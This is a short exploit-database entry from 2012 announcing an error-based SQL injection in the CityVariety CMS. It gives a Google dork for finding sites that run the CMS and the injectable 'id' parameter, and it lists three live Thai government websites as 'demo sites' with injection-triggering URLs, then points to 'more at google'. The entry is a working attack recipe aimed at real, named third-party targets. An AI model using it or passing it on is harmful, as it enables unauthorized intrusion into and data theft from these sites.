id: 18203
date: 05/06/2012
title: CityVariety SQL Injection Vulnerability
author: k2ll33d
cves: 

# Exploit Title: CityVariety MySQL error based injection
# Date: 06/05/2012
# Author: ReZK2LL Team : k2ll33d - Farouk reseau - ala Manai
# Vendor : http://www.cityvariety.co.th
# Version: N/A
# Category: webapps
# Google dork: intext:"powered by CityVariety Corporation" inurl:index.php?options=newsall
# Tested on: win7

---------------------------------
#vuln:
localhost/index.php?options=otop&mode=detail&id=sqli

# Demo sites:
http://nongdindang.go.th/index.php?options=newsall&mode=detail&id=1067'
http://www.sabayoi.go.th/index.php?options=newsall&mode=detail&id=32713'
http://www.bortru.go.th/index.php?options=newsall&mode=detail&id=32707'

and more at google ;)



#  0day.today [2023-03-27]  #